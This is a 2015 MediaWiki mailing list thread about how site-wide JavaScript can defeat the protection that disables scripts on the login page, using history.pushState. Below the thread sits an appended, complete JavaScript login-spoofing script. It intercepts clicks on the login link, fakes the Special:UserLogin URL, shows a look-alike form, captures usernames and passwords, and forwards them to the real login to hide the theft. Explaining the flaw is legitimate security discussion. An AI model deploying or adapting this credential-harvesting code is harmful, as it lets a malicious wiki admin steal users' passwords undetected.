As an alternative, please send details of the exploit to the security list, or just file a security bug.

On Sep 30, 2015 13:03, "John" <phoenixoverride@gmail.com> wrote:
Can you provide any documentation on the details of this exploit?
On Wed, Sep 30, 2015 at 12:50 PM, Daniel Friesen <daniel@nadir-seen-fire.com> wrote:
Bug? There is nothing that can be fixed.
You just have to accept that as long as the login page is on the same domain as site scripts, there is no way to stop those scripts from controlling the login page.
~Daniel Friesen (Dantman, Nadir-Seen-Fire) [http://danielfriesen.name/]
On 2015-09-30 9:33 AM, Tyler Romeo wrote:
Is there a bug filed for that?

On Sep 30, 2015 12:13, "Daniel Friesen" <daniel@nadir-seen-fire.com> wrote:
On 2015-09-30 8:48 AM, Chris Steipp wrote:
- We disable site and user .js on Special:UserLogin, so a malicious admin can't add password sniffing JavaScript to the login page
Note that you can make use of pushState to render this protection moot for anyone who clicks the login link instead of directly visiting the UserLogin page. Which is practically everyone.
~Daniel Friesen (Dantman, Nadir-Seen-Fire) [http://danielfriesen.name/]
MediaWiki-l mailing list To unsubscribe, go to: https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
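Daniel's pushState point, as an added illustration that is not part of this thread and not MediaWiki code. It shows what site-wide JavaScript (which still runs on every page except Special:UserLogin) can do when the user clicks the login link rather than typing the URL: cancel the navigation, push the real login URL into the address bar with history.pushState, and render a look-alike form on the page it already controls. The short-URL layout (/wiki/Special:UserLogin), the field names wpName and wpPassword, and the window, document and history objects passed in as parameters are assumptions made so the logic can be exercised outside a browser; in a real page they would be window.location, document and window.history.

```javascript
'use strict';

// Assumed wiki URL layout for this example: short URLs under /wiki/ plus the
// index.php?title= form. Adjust for the wiki being examined.
const LOGIN_PATH = '/wiki/Special:UserLogin';

// True if an <a href> points at the login page, via either URL form.
// Relative hrefs are resolved against baseUrl (the current page).
function isLoginLink(href, baseUrl) {
  let u;
  try {
    u = new URL(href, baseUrl);
  } catch (e) {
    return false; // not a parseable URL, so not the login link
  }
  return u.pathname === LOGIN_PATH || u.searchParams.get('title') === 'Special:UserLogin';
}

// Markup for the look-alike form. The input names are assumed to match the
// real login form so the captured values can be replayed against it.
function fakeLoginFormHtml(loginUrl) {
  return `<form id="spoofed-login" action="${loginUrl}" method="post">` +
    '<label>Username <input name="wpName"></label>' +
    '<label>Password <input name="wpPassword" type="password"></label>' +
    '<button type="submit">Log in</button></form>';
}

// Read the credentials the user typed into the fake form.
function harvestCredentials(form) {
  return {
    username: form.elements.namedItem('wpName').value,
    password: form.elements.namedItem('wpPassword').value,
  };
}

// Install on a window-like object: intercept clicks on the login link, make the
// address bar show Special:UserLogin without ever loading it (so the server never
// gets to serve the JS-free page), and replace the body with the fake form.
// onCapture is the attacker's sink; in a real attack it would send the values
// off-site before the genuine login is submitted.
function installLoginSpoof(win, onCapture) {
  const { document, history, location } = win;
  document.addEventListener('click', (ev) => {
    const a = ev.target && typeof ev.target.closest === 'function'
      ? ev.target.closest('a[href]')
      : null;
    if (!a) return;
    const href = a.getAttribute('href');
    if (!isLoginLink(href, location.href)) return;

    ev.preventDefault(); // do not actually navigate
    const loginUrl = new URL(href, location.href).href;
    history.pushState({ spoofed: true }, '', loginUrl); // URL bar now reads Special:UserLogin
    document.body.innerHTML = fakeLoginFormHtml(loginUrl);

    const form = document.getElementById('spoofed-login');
    form.addEventListener('submit', (sub) => {
      sub.preventDefault();
      onCapture(harvestCredentials(form)); // sniff first ...
      form.submit();                       // ... then post to the real login URL so nothing looks odd
    });
  });
}
```

The only thing the server-side protection sees in this flow is the eventual POST to Special:UserLogin; the page that disables site and user JS is never rendered in the victim's browser. That is why the thread concludes there is nothing to fix at the login page itself: the script controlling the page the user clicks from controls what the user sees next.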